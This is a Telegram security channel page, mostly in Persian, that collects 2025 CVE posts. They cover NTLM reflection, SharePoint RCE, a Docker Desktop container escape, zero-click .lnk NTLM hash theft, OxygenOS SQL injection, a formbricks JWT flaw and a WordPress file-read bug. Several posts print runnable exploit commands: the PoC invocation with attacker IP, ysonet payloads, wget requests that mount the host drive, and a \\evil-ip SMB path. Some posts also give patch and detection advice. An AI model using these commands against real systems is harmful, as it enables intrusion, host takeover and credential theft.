RadvanSec
1.04K subscribers
189 photos
27 videos
144 files
605 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
🚨 CVE-2025-33073 – Reflection Issue NTLM در SMB
نوع آسیب‌پذیری: NTLM reflection (بازتابی)، که می‌تواند منجر به اجرای کد در سیستم قربانی شود.


امکان حمله:
ساختار SMB/NTLM بازتابی معمولاً در شبکه‌های داخلی بکار می‌رود، خصوصاً وقتی پروتکل‌هایی مثل LLMNR فعال باشند.
بهره‌برداری از طریق ابزارهایی مانند impacket-ntlmrelayx.

لینک PoC اسکپلویت:

https://github.com/mverschu/CVE-2025-33073

python3 CVE-2025-33073.py -u 'DOMAIN\User' -p 'password' \
--attacker-ip 192.168.1.5 --dns-ip 192.168.1.3 \
--dc-fqdn DC01.domain.local --target-victim-Victim1

این PoC بسیار کامل است، تا حدی که قابلیت اجرای دستور custom یا استخراج افشای اطلاعات
را دارد.

#CVE #zerosec
──────────────
📡 Follow :
👉 @zerosec_team
2
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)

Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit

Upd: https://github.com/irsdl/ysonet


ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"



ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"


Patched: July 20, 2025

⭐️ @ZeroSec_team
4
Forwarded from Xero Notes
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - https://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - https://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
5🔥1
🚨 آسیب‌پذیری Zero-Click جدید در ویندوز (CVE-2025-50154) 🚨

آسیب‌پذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور می‌زنه
این باگ به مهاجم اجازه می‌ده بدون نیاز به کلیک کاربر (Zero-Click) هش‌های NTLMv2 رو بدزده و حتی فایل‌های اجرایی رو بی‌سروصدا دانلود کنه

چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود می‌شه می‌تونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر می‌کنه (مثلاً تو پوشه Downloads) یه درخواست SMB می‌فرسته و بوم! هش NTLMv2 کاربر لو می‌ره تازه فایل اجرایی هم تو %TEMP% دانلود می‌شه

این هش‌ها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه می‌تونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هش‌ها رو بگیرید. با Wireshark هم می‌تونید رفتار رو مانیتور کنید

لینک PoC
https://lnkd.in/d6w4Vk4p


🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟

ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید


#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick

⭐️ @ZeroSec_team
4❤‍🔥1
محققای Rapid7 یک آسیب پذیری با شناسه ی CVE-2025-10184 و از نوع Blind SQL Injection، در سیستم عامل OxygenOS کشف و گزارش کردن که به یک برنامه، امکان دسترسی به داده ها و متادیتای SMS/MMS رو میده.

سیستم عامل OxygenOS، یک سیستم عامل مبتنی بر اندروید از شرکت چینی OnePlus، زیر مجموعه ی Oppo هستش.

محققا این آسیب پذیری رو یک مه، 11 اردیبهشت برای شرکت ارسال کردن، اما نتیجه ای نداشته، در نهایت گزارش فنی + PoC برای این آسیب پذیری رو بصورت عمومی منتشر کردن.

آسیب پذیری فعلا اصلاح نشده، بنابراین توصیه شده:

- برنامه های نصب شده روی گوشی رو به حداقل برسونید.
- به برنامه های معتبر از ناشران معتبر، اعتماد کنید.
- از احراز هویت دو عاملی مبتنی بر پیامک به برنامه های OTP مانند Google Authenticator مهاجرت کنید.
- با توجه به اینکه پیامک ها در دستگاههای OnePlus بدرستی ایزوله نشدن، توصیه شده ارتباطات حساس رو تنها از طریق اپلیکیشن ‌های رمزگذاری‌شده‌ی سرتاسری (E2EE) انجام بدید.
- در ایران باید مراقب رمزهای دوم بانکی و ... هم باشیم.

#آسیب_پذیری_امنیتی
#PoC #OxygenOS #Oppo #OnePlus #CVE

⭐️ @ZeroSec_team
👍5
Forwarded from GO-TO CVE (| | Sharo K h | |)
سرویس اوپن سورس formbricks یه cve خورده
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors

حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه


export const verifyToken = async (token: string): Promise<JwtPayload> => {
// First decode to get the ID
const decoded = jwt.decode(token);
const payload: JwtPayload = decoded as JwtPayload;


https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4

#CVE-2025-59934
5
Forwarded from OnHex
🔴 آسیب پذیری با شناسه ی CVE-2025-11705 در افزونه ی وردپرسی Anti-Malware Security and Brute-Force Firewall کشف و اصلاح شده که امکان افشای اطلاعات رو به مهاجمی که عضو سایت (Subscriber) هستش، میده.

نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل‌ تر
نسخه اصلاح شده: ۴.۲۳.۸۳

سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.

آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.

#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE

🆔 @onhex_ir
➡️ ALL Link
1👍1